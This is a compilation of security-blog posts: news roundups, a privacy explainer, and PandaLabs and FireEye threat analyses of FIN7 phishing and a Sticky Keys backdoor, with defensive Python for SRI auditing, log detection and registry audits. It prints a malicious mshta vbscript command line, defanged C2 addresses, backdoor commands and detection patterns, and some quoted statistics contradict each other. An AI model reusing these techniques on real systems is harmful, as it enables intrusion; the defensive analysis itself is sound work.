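# Constructed checkout page. This is not Ticketmaster's markup and not the
# BrowseAloud snippet; the hostnames are example domains chosen for the demo.
CHECKOUT_PAGE = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.org/lib.js"
        integrity="sha384-AbC123placeholder" crossorigin="anonymous"></script>
<script src="https://chat.example.net/widget.js"></script>
<script src="//accessibility.example.com/plus/scripts/ba.js"
        integrity="sha384-XyZ456placeholder"></script>
</head><body><form id="payment"></form></body></html>
"""


class ScriptCollector(HTMLParser):
    """Collect every external <script src=...> with its attributes."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            attrs = dict(attrs)          # HTMLParser lowercases attribute names
            if attrs.get("src"):
                self.scripts.append(attrs)


def is_third_party(src, first_party_hosts):
    """Relative URLs have no host; absolute and protocol-relative ones do."""
    host = urlparse(src).hostname
    return host is not None and host not in first_party_hosts


def audit(page_html, first_party_hosts):
    """One finding per third-party script the browser cannot pin to a known copy."""
    collector = ScriptCollector()
    collector.feed(page_html)
    findings = []
    for s in collector.scripts:
        src = s["src"]
        if not is_third_party(src, first_party_hosts):
            continue
        if "integrity" not in s:
            findings.append((src, "no integrity attribute: any change upstream runs on this page"))
        elif "crossorigin" not in s:
            # SRI needs a CORS-mode fetch; an opaque cross-origin response cannot be
            # checked, so the browser refuses to run the script and the page breaks.
            findings.append((src, "integrity set without crossorigin: script will be blocked, not pinned"))
    return findings


def sri_hash(content, algo="sha384"):
    """Value for integrity="..." computed from a reviewed copy of the script."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def sri_matches(content, integrity):
    """What the browser does at load time: recompute and compare."""
    algo = integrity.split("-", 1)[0]
    return sri_hash(content, algo) == integrity


if __name__ == "__main__":
    for src, problem in audit(CHECKOUT_PAGE, {"shop.example"}):
        print(f"{src}: {problem}")
    print(sri_hash(b"console.log('hello')"))
```

SRI only pins a static file. Widgets that fetch further code at runtime, as chat and accessibility tools commonly do, fall outside what the hash covers, so the stronger controls are the ones Inbenta's statement points at: keep third-party code off the payment page altogether, isolate the card form on its own origin, and lock the page down with a Content Security Policy script-src so that an unexpected script host cannot execute at all.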

GDPR preparation or panic, depending on your position, is gaining momentum with less than 100 days before the privacy regulation comes into force in late May. Here are some of the latest GDPR articles of note.

Digital Guardian released an interactive article where you can try to guess the value of various types of stolen data to cybercriminals: Digital Guardian: Do you know your data's worth?

Bestvpns released a comprehensive infographic covering the 77 Facts About Cyber Crime we should all know about in 2018.

February was yet another frantic month for security updates: Microsoft released more than 50 patches, and there were new critical security updates from Adobe, Apple, Cisco, Dell and Drupal.


Cyber Security Roundup for January 2018

2018 started with a big security alert after Google's Project Zero researchers, together with academic teams, disclosed serious security vulnerabilities in just about every modern computer processor. Named 'Meltdown' and 'Spectre', the flaws abuse speculative execution so that code running on a machine can read confidential data from memory it should not be able to access. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor microcode. While processor manufacturers have been rather lethargic in reacting and producing patches for the problem, software vendors such as Microsoft, Google and Apple reacted quickly, releasing security updates to protect their customers from the vulnerable processors; kudos to them.

The UK Information Commissioner's Office (ICO) heavily criticised Carphone Warehouse for its security inadequacies and fined the company £400,000 over its 2015 data breach, in which hackers stole the personal data, including bank details, of millions of Carphone Warehouse customers. At the time the company described it as a "sophisticated cyber attack"; where have we heard that excuse before? Certainly the ICO wasn't buying it after its investigation, which reported a large number of security failures at Carphone Warehouse: software that was six years out of date, a lack of “rigorous controls” over who had login details to systems, no antivirus protection running on the servers holding the data, the same root password used on every individual server and known to “some 30-40 members of staff”, and the needless storage of full credit card details. Carphone Warehouse should thank its lucky stars the breach didn't occur after the General Data Protection Regulation comes into force in May 2018; with such a damning list of security failures, the company could well have been fined considerably more by the ICO, which gains vastly greater financial sanctions and powers under the GDPR.

The National Cyber Security Centre warned that the UK's national infrastructure faces serious nation-state attacks, stating it is a matter of "when", not "if". There were also claims that the cyber attacks against Ukraine in recent years were Russia testing and tuning its nation-state cyber attack capabilities.

At the Davos summit, the Maersk chairman revealed that his company spent a massive £200m to £240m recovering from last year's NotPetya outbreak, after the malware 'totally destroyed' the Maersk network. That is a huge price to pay for unpatched systems, though patching alone would not have stopped NotPetya: besides the SMB exploit that Microsoft had already patched, it spread laterally using credentials harvested from infected machines, so network segmentation and credential hygiene mattered as much as patch cadence.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k heist from BlackWallet, in which the hackers redirected BlackWallet users to a replica of the site after compromising BlackWallet's DNS server. The replica ran a script that transferred users' cryptocurrency into the hackers' wallet; the attackers then moved the funds on to a different wallet platform.

In the United States, the Federal Trade Commission (FTC) fined toy firm VTech US$650,000 (£482,000) for violating US children's privacy law. The FTC alleged the toy company violated the Children's Online Privacy Protection Rule (COPPA) by collecting personal information from hundreds of thousands of children without providing direct notice.

It was reported that a POS malware infection at Forever 21, together with lapses in encryption, was responsible for the theft of debit and credit card details from Forever 21 stores late last year. Payment card data remains a high-value target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January. The Online Trust Alliance's Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents doubled in 2017 and that 93% were preventable. Carbon Black's 2017 Threat Report stated that non-malware (fileless) attacks were behind the majority of the cyber incidents reported in 2017, despite the proliferation of malware available to both professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and that the number of attacks skyrocketed over the course of the year; no surprise there.

Malwarebytes' 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also let them identify ideal attack points from which to launch more powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and that companies that are privacy-mature have fewer data breaches and smaller losses from cyber attacks.


STOP FAKE NEWS – PAUSE, EVALUATE and FORWARD


The potential for fake news to go viral on social media is very real. There have been several instances where rumours have incited mob violence between rival communities. Matters got out of hand when tribal villagers in a remote Indian district received a WhatsApp message claiming that a gang was kidnapping children and selling their body parts. The message went viral in these villages, and mobs of up to 500 people pounced on strangers they suspected of being the child kidnappers; in all there were two incidents in which 7 people were lynched.
It is quite apparent to every cybercitizen that fake or distorted news is on the rise. Social media gives every individual a platform to disseminate such news or information. Fake news is routinely posted for vested interests such as political distortion, defamation, mischief, inciting trouble and settling personal scores.

As the case above illustrates, when fake news goes viral the ill effects escalate to a point where they can cause physical damage, loss of life or long-term animosity between sections of society. Purposely crafted fake or distorted news, introduced over periods of time by vested interests, can distort perspectives and social harmony. Such news is effectively used for ideological indoctrination.

Creating fake news is extremely simple. Listed below are six commonly used methods:

· Individuals concoct their own stories
· Marketers release competitive advertisements based on unproven data
· Groups with vested interests manipulate the volume and narrative of news
· Photographs are morphed
· Old photographs are used to depict recent events
· Real photographs are used to defame

It is also quite easy to catch the perpetrator. A few years back, a Twitter hoax was dealt with by a strong reprimand, but not today: fake news, hoaxes, rumours or any other content that results in incitement or defamation attracts stronger penalties and jail terms, and police are more aware and vigilant.
Most cybercitizens unwittingly help fake news go viral by recirculating it. Each forward creates a sense that the story must be true, because the previous sender must have validated it before sending.

Pause before forwarding, evaluate veracity, and only then forward. Do not be the link in the chain responsible for circulating fake news.
Cybercitizens, take care when crafting messages on social media: a little mischief may earn you a few years in government-paid accommodation, i.e. jail. Advise your children to be responsible and to cross-check news received over social media before believing or recirculating it.

What is Data Privacy and why is it an important issue?

The question of whether privacy is a fundamental right is being argued before the honourable Supreme Court of India. It is a topic to which a young India is waking up. Privacy is often equated with liberty, and young Indians want adequate protection to express themselves.

Privacy according to Wikipedia is the ability of an individual or group to seclude themselves, or information about themselves, and thereby express themselves selectively. There is little contention over the fact that privacy is an essential element of Liberty and the voluntary disclosure of private information is both part of human relationships and a digitized economy.

Data privacy is being debated because electronic records that are private by nature, such as sexual orientation, medical records, credit card information and email, are inherently open to surveillance and disclosure.

Disclosure can take place through wrongful use and distribution of the data, for example for marketing, through surveillance by governments, or through outright data theft by cyber criminals. In each case a cybercitizen's right to disclose specific information to specific companies or people, for a specific purpose, is violated.

Citizens in Western countries are legally protected through data protection regulation. Eight principles are designed to prevent unauthorised use of personal data by governments, organisations and individuals:

Lawfulness, Fairness & Transparency
Personal data must be processed on the basis of consent given by data subjects. Companies have an obligation to tell data subjects what their personal data will be used for. Data acquired cannot simply be passed on to other entities, such as marketers.
Purpose limitation
Personal data collected for one purpose should not be used for a different purpose. If data was collected to deliver an insurance service, it cannot be used to market a different product.
Data minimization
Organizations should restrict collection of personal data to only those attributes needed to achieve the purpose for which consent from the data subject has been received.
Accuracy
Data has to be collected, processed and used in a manner that ensures it is accurate. A data subject has the right to inspect and even correct the data.
Storage limitation
Personal data should be collected for a specific purpose and not retained for longer than necessary in relation to that purpose.
Integrity and confidentiality
Organizations that collect this data are responsible for its security against data thefts and data entry/processing errors that may alter the integrity of data.
Accountability
Organizations are accountable for the data in their possession.
Cross-border transfer requirements
Personal information must be processed and stored in a secure environment, and this must be ensured when the data is processed outside the borders of the country.

It is important for cybercitizens to understand their privacy rights particularly in context of information that can be misused for financial gain or to cause reputational damage.




The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report


Developments in Cyber-crime, Cyberwarfare and AI mark the first quarter of 2017, as indicated by PandaLabs Q1 Report. The Report by Panda Security’s malware resource facility identifies prominent tactics, attack methods and shifts in the industry.

The cyber-crime industry continues to grow on the back of profitable attacks. The development of Ransomware-as-a-Service (RaaS) and of organisations such as vDOS, which specialised in DDoS-for-hire, indicates how professional the cyber-crime industry has become. In Q1 we continued to see new and adapted attack methods, such as RDPatcher, malware detected by PandaLabs that attempts to gain access to the victim’s endpoint and prepare it for rental on the dark web.

Politically motivated cyber-attacks

Fuelling the continued development of the cyber-crime industry are politically motivated cyber-attacks. In recent months, cyberwarfare has become a popular tactic for enforcing political agendas. In Q4 of 2016 we saw some of the first high-profile instances, with accusations of Russian interference in the 2016 US elections. The gravity of the development is clear: countries like Germany have begun to set up cyber-command centres to monitor online activity, and this quarter France and the Netherlands reconsidered electronic voting procedures to avoid a repeat of the 2016 US situation.

Targeted IoT device attacks

Targeted attacks on IoT devices continue to threaten our safety, in line with the ever-increasing number of such devices. In February, at the European Broadcasting Union Media Cyber Security Seminar, security consultant Rafael Scheel demonstrated more ways these devices can breach unsecured networks, with an exploit that lets an attacker take control of a smart TV using only a rogue DVB-T broadcast signal.

A perfect device for eavesdropping

Recent developments in robotics and AI have led to the belief that the fourth industrial revolution is not far off. Robotics and AI technology could do more than just take over jobs: virtual assistants like Google Home and Amazon Echo can become a dangerous inroad for hackers. Introduced in February 2017, Google Home can tune into your home IoT devices while waiting to be called on, making it the perfect device for eavesdropping. Police recently requested access to an Amazon Echo device as it may have held evidence useful to their case.

Over the course of 2016, ransomware attacks earned criminals billions of rand. Fuelled by this profitability, ransomware attacks continue to increase, with new variants created daily. In Q1 PandaLabs discovered the ransomware variant WYSEWYE, which allows the attacker to select and take control of specific folders on the victim’s endpoint, ultimately demanding a ransom to give control back to the victim.

See the full report by PandaLabs here.

The post The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report appeared first on CyberSafety.co.za.

FIN7 Evolution and the Phishing LNK

FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.

In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.

In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints, catering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process.

Infection Chain

While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object.

By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action.

Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents

The malicious LNK launches “mshta.exe” with the following arguments passed to it:

vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")

The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.

Figure 2: Textbox inside DOC

The combined script from Word textbox drops the following components:

\Users\[user_name]\Intel\58d2a83f7778d5.36783181.vbs
\Users\[user_name]\Intel\58d2a83f777942.26535794.ps1
\Users\[user_name]\Intel\58d2a83f777908.23270411.vbs

Also, the script creates a named scheduled task for persistence that launches “58d2a83f7778d5.36783181.vbs” every 25 minutes.
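As an added example (not code from the FireEye post), the following Python flags this execution chain in process-creation telemetry: mshta.exe started with an inline vbscript: handler that pulls its script out of the open Word document, a scheduled task whose action is a script under a user profile, and a script host spawning PowerShell on such a script. The log records, the Sysmon-style field layout, the user name and the schtasks command line are constructed assumptions; the post does not say how the task was registered.

```python
import re

# Constructed Sysmon-style process-creation records: "parent image|image path|command line".
# Field layout, user name, task name and the schtasks command line are assumptions.
SAMPLE_LOG = """\
WINWORD.EXE|C:\\Windows\\System32\\mshta.exe|mshta.exe vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")
mshta.exe|C:\\Windows\\System32\\schtasks.exe|schtasks.exe /Create /SC MINUTE /MO 25 /TN Intel /TR "wscript.exe C:\\Users\\jdoe\\Intel\\58d2a83f7778d5.36783181.vbs" /F
wscript.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -File C:\\Users\\jdoe\\Intel\\58d2a83f777942.26535794.ps1
explorer.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe "C:\\Program Files\\Vendor\\setup.hta"
svchost.exe|C:\\Windows\\System32\\schtasks.exe|schtasks.exe /Create /SC DAILY /TN Backup /TR "C:\\Program Files\\Backup\\run.exe"
"""

# mshta.exe accepts a script directly on its command line through a protocol handler,
# so nothing has to be written to disk before it executes.
INLINE_SCRIPT = re.compile(r"\b(vbscript|javascript):", re.IGNORECASE)
# The lure's trick: attach to the already open Word document and execute its text boxes.
WORD_GETOBJECT = re.compile(r'GetObject\(\s*,\s*"{1,2}Word\.Application', re.IGNORECASE)
# A script file living under a user profile (the lure used \Users\<user>\Intel\).
USER_SCRIPT = re.compile(r"\\Users\\[^\\\"\s]+\\.*?\.(vbs|ps1|js|wsf)\b", re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")


def parse_record(line):
    """Split one record into (parent image, image file name, command line), lower-casing names."""
    parent, image, cmdline = line.split("|", 2)
    return parent.lower(), image.lower().rsplit("\\", 1)[-1], cmdline


def analyse(log_text):
    """Return (rule name, record index) pairs for records matching the lure's chain."""
    findings = []
    for idx, line in enumerate(log_text.strip().splitlines()):
        parent, image, cmdline = parse_record(line)
        if image == "mshta.exe" and INLINE_SCRIPT.search(cmdline):
            rule = "mshta_inline_script"
            if WORD_GETOBJECT.search(cmdline):
                rule = "mshta_script_from_word_document"
            findings.append((rule, idx))
        if image == "schtasks.exe" and "/create" in cmdline.lower() and USER_SCRIPT.search(cmdline):
            findings.append(("schtask_runs_user_profile_script", idx))
        if image == "powershell.exe" and parent in SCRIPT_HOSTS and USER_SCRIPT.search(cmdline):
            findings.append(("script_host_spawns_powershell_script", idx))
    return findings


if __name__ == "__main__":
    for rule, idx in analyse(SAMPLE_LOG):
        print(f"record {idx}: {rule}")
```

The two benign records (an .hta launched from disk, a task pointing at Program Files) produce no finding, which is the precision check worth keeping when tuning the user-profile path rule.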

VBScript #1

The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.

PowerShell Script

“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager.

The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:

aaa.stage.14919005.www1.proslr3[.]com

Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:

[a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com

VBScript #2

“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder with a GUID name inside “Intel” and drops the VBScript payloads and configuration files:

\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777638.60220156.ini
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777688.78384945.ps1
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776b5.64953395.txt
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776e0.72726761.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777716.48248237.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777788.86541308.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\Foxconn.lnk

This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.

HALFBAKED Backdoor Variant

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This version of HALFBAKED connects to the following C2 URLs (one server, three ports):

hxxp://198[.]100.119.6:80/cd
hxxp://198[.]100.119.6:443/cd
hxxp://198[.]100.119.6:8080/cd

This version of HALFBAKED listens for the following commands from the C2 server:

  • info: Sends victim machine information (OS, processor, BIOS and running processes) gathered with WMI queries
  • processList: Sends the list of running processes
  • screenshot: Takes a screenshot of the victim machine (using 58d2a83f777688.78384945.ps1)
  • runvbs: Executes a VBScript
  • runexe: Executes an EXE file
  • runps1: Executes a PowerShell script
  • delete: Deletes the specified file
  • update: Updates the specified file

All communication between the backdoor and the attacker C2 is encoded using the following technique, represented in pseudo code:

Function send_data(data)
    random_string = custom_function_to_generate_random_string()
    encoded_data = URLEncode(SimpleEncrypt(data))
    post_data("POST", random_string & "=" & encoded_data, Hard_coded_c2_url, Create_Random_Url(class_id))

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor. Click here for more information.

Persistence Mechanism

Figure 3 shows that, for persistence, the document creates two scheduled tasks and one auto-start registry entry pointing to the LNK file.

Figure 3: FIN7 phishing lure persistence mechanisms

Examining Attacker Shortcut Files

In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment. These files can be parsed with lnk-parser to extract all contents. LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address.

For example, one of these FIN7 LNK files contained the following properties:

  • Version: 0
  • NetBIOS name: andy-pc
  • Droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • Birth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Birth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • MAC address: 08:00:27:3d:52:68
  • UUID timestamp: 03/21/2017 (12:12:28.500) [UTC]
  • UUID sequence number: 2861

From this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.
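As an added example (not from the FireEye post), the Python below decodes the droid file identifier listed above: it is an RFC 4122 version-1 UUID, so its bytes carry the creation timestamp, the clock sequence and the MAC address of the generating host, whose 08:00:27 prefix is the VirtualBox OUI. The OUI table, the property dictionary and the summarise_tracker() helper are my own assumptions.

```python
import uuid
from datetime import datetime, timedelta, timezone

# A version-1 UUID counts 100 ns ticks from 1582-10-15 00:00:00 UTC; this well-known
# constant is the tick count at the Unix epoch.
UUID_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)
UNIX_EPOCH_TICKS = 0x01B21DD213814000

# OUI prefixes of common hypervisor virtual NICs (assumed table of well-known assignments).
VIRTUAL_OUIS = {
    "08:00:27": "VirtualBox",
    "00:0c:29": "VMware",
    "00:50:56": "VMware",
    "00:15:5d": "Hyper-V",
}

# The tracker properties quoted in the post (constructed dict holding the page's values).
FIN7_LNK_TRACKER = {
    "droid_volume_id": "e2c10c40-6f7d-4442-bcec-470c96730bca",
    "droid_file_id": "a6eea972-0e2f-11e7-8b2d-0800273d5268",
    "birth_droid_volume_id": "e2c10c40-6f7d-4442-bcec-470c96730bca",
    "birth_droid_file_id": "a6eea972-0e2f-11e7-8b2d-0800273d5268",
}


def parse_droid_file_id(droid):
    """Decode the host artefacts a version-1 droid file identifier carries."""
    u = uuid.UUID(droid)
    if u.version != 1:
        raise ValueError(f"{droid} is version {u.version}; only v1 embeds time and MAC")
    # u.time is the 60-bit tick count; integer-divide by 10 to get microseconds.
    created = UUID_EPOCH + timedelta(microseconds=u.time // 10)
    mac = ":".join(f"{(u.node >> shift) & 0xFF:02x}" for shift in range(40, -1, -8))
    return {
        "created_utc": created,
        "unix_time": (u.time - UNIX_EPOCH_TICKS) / 1e7,
        "clock_seq": u.clock_seq,
        "mac": mac,
        "vendor": VIRTUAL_OUIS.get(mac[:8], "unknown/physical"),
        # RFC 4122 sets the multicast bit when the node is random rather than a real MAC.
        "random_node": bool((u.node >> 40) & 0x01),
    }


def summarise_tracker(props):
    """Read the birth/current pairs the way an analyst does: was the file created on the
    same volume and host it was last saved on, and what does that host look like?"""
    birth = parse_droid_file_id(props["birth_droid_file_id"])
    current = parse_droid_file_id(props["droid_file_id"])
    return {
        "same_volume": props["birth_droid_volume_id"].lower() == props["droid_volume_id"].lower(),
        "same_host": birth["mac"] == current["mac"],
        "created_utc": birth["created_utc"],
        "host_mac": current["mac"],
        "host_vendor": current["vendor"],
    }


if __name__ == "__main__":
    for key, value in summarise_tracker(FIN7_LNK_TRACKER).items():
        print(f"{key}: {value}")
```

A random_node of True would mean the generating system hid its MAC behind a random node value, so the vendor lookup should then be ignored.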

Example Phishing Lures

  • Filename: Doc33.docx
  • MD5: 6a5a42ed234910121dbb7d1994ab5a5e
  • Filename: Mail.rtf
  • MD5: 1a9e113b2f3caa7a141a94c8bc187ea7

FIN7 April 2017 Community Protection Event

On April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection Event (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our product team – to secure all clients affected by this campaign.

A User-Friendly Interface for Cyber-criminals


Installing malware through Remote Desktop Protocol is a popular attack method used by many cyber-criminals. Over the past few months Panda Security’s research facility, PandaLabs, has analysed several attacks of this nature.

Once credentials are obtained through a brute-force attack on RDP, the cyber-criminals gain access to the company. Attackers then simply execute the corresponding malware to start the encryption.

Recently, however, PandaLabs has noticed more personalised attacks. Analysing this intrusion, we see that the ransomware comes with its own interface through which it can be configured according to the attacker’s preferences, starting with details such as which email address will appear in the ransom note. This customised attack makes it possible to hand-pick the devices the hackers would like to act on.

Advanced attacks we continue to see in this environment require businesses to employ a corporate network security strategy. Preventing zero-day attacks from entering your network is essential, along with efforts to neutralise and block attacks.

Data collected from Panda clients in Europe indicated that Panda Adaptive Defense 360 (AD360) was able to detect and block this particular attack. Timely investment in prevention, detection and response technology, such as AD360, guarantees better protection against new-age threats.

The post A User-Friendly Interface for Cyber-criminals appeared first on CyberSafety.co.za.

Hackers Spark Revival of Sticky Keys Attacks


Hackers are constantly trying to find new ways to bypass cyber-security efforts, sometimes turning to older, almost forgotten methods to gain access to valuable data. Researchers at PandaLabs, Panda Security’s anti-malware research facility, recently detected a targeted attack which did not use malware, but rather used scripts and other tools associated with the operating system itself in order to bypass scanners.

Using an attack method that has gained popularity recently, the hackers launch a brute-force attack against a server with the Remote Desktop Protocol (RDP) enabled. Once they have the login credentials of a device, the intruders gain complete access to it.
At this stage, the attackers run the sethc.exe file with the parameter 211 from the computer’s Command Prompt window (CMD), turning on the ‘Sticky Keys’ feature.

Next, the hacker launches Traffic Spirit, a traffic generator application that ensures the attack is lucrative for the cyber-criminals.

Once this is complete, a self-extracting file is launched that uncompresses the following files in the %Windows%\cmdacoBin folder:
• registery.reg
• SCracker.bat
• sys.bat

The hacker then runs the Windows registry editor (Regedit.exe) to add the key contained in the registery.reg file.

This key aims at ensuring that every time the Sticky Keys feature is used (sethc.exe), a file called SCracker.bat is run. This is a batch file that implements a very simple authentication system; running it displays a window prompting for a user name and password.

The user name and password are obtained from two variables included in the sys.bat file.

This creates a backdoor into the device through which the hacker gains access. Using the backdoor, the hacker is able to connect to the targeted computer without entering Windows login credentials: enabling the Sticky Keys feature and supplying the user name and password from sys.bat is enough to open a command shell.

The command shell shortcuts allow the hacker to access certain directories, change the console colour, and make use of other typical command-line actions.

The attack doesn’t stop there. In an attempt to capitalise further, a Bitcoin miner is installed on every compromised computer. This software uses the victims’ computer resources to generate the virtual currency without them realising it.
Even if the victim realises their device has been breached and changes their credentials, the hacker is still able to gain access to the system: pressing the SHIFT key five times enables Sticky Keys, allowing the cyber-criminal to activate the backdoor once again.
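As an added example (not from the PandaLabs post), this Python audits a registry export for an Image File Execution Options “Debugger” value, the registry setting that makes Windows start a substitute program whenever an image such as sethc.exe is invoked, which is the effect the post describes. The .reg content, the SCracker.bat path and the list of accessibility binaries are constructed assumptions; the post shows its actual key only as a screenshot.

```python
import re

IFEO_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
            r"\Image File Execution Options")
# Accessibility helpers reachable from the logon screen (assumed list of the usual suspects).
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')

# Constructed .reg export; the sethc.exe entry reproduces the effect the post describes
# (SCracker.bat runs whenever Sticky Keys is invoked), but the exact key is assumed.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\cmdacoBin\\SCracker.bat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\MyDebugger.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"MitigationOptions"=hex(b):00,00,00,00,00,00,00,00
"""


def unescape_reg_string(data):
    """Turn a quoted REG_SZ literal back into its value; other types are left as written."""
    if not (data.startswith('"') and data.endswith('"')):
        return data
    return re.sub(r"\\(.)", r"\1", data[1:-1])  # .reg escapes \ and " with a backslash


def audit_ifeo_debuggers(reg_text):
    """List every Debugger value under IFEO; Windows starts that program instead of
    the named image and hands it the original command line."""
    findings = []
    current_key = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]
            continue
        if not current_key or not current_key.lower().startswith(IFEO_KEY.lower() + "\\"):
            continue
        m = VALUE_RE.match(line)
        if not m or m.group("name").lower() != "debugger":
            continue
        image = current_key.rsplit("\\", 1)[-1].lower()
        findings.append({
            "image": image,
            "debugger": unescape_reg_string(m.group("data")),
            # A debugger on a logon-screen accessibility binary is the Sticky Keys backdoor.
            "severity": "critical" if image in ACCESSIBILITY_BINARIES else "review",
        })
    return findings


if __name__ == "__main__":
    for finding in audit_ifeo_debuggers(SAMPLE_REG):
        print(f"{finding['severity']:8} {finding['image']} -> {finding['debugger']}")
```

Regedit writes exports as UTF-16 with a byte-order mark, so a file read from disk should be opened with encoding="utf-16" before it is passed in.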

Adaptive Defense 360, Panda Security’s advanced cyber-security solution, was capable of stopping this targeted attack thanks to the continuous monitoring of the company’s IT network, saving the organisation from serious financial and reputational harm. Business leaders need to recognise the need for advanced security, such as AD360, to protect their network from these kinds of attacks.

The post Hackers Spark Revival of Sticky Keys Attacks appeared first on CyberSafety.co.za.

Cyber Security Predictions for 2017


Analysis

2016 kicked off with more than 20 million new samples of malware detected and neutralised by PandaLabs – an average of 227,000 per day. This figure is slightly higher than that of 2015, which saw around 225,000 per day.

Throughout 2016, we’ve seen the number of new malware samples come in slightly lower than in 2015 — about 200,000 new samples per day on average — while attacks have become more effective.

Cybercriminals are becoming more confident in their abilities, and, although figures have been lower than expected, there is still cause for concern. Hackers appear to be concentrating their efforts into the most profitable attacks, utilising sophisticated techniques that allow them to make quick and easy money in an efficient manner.

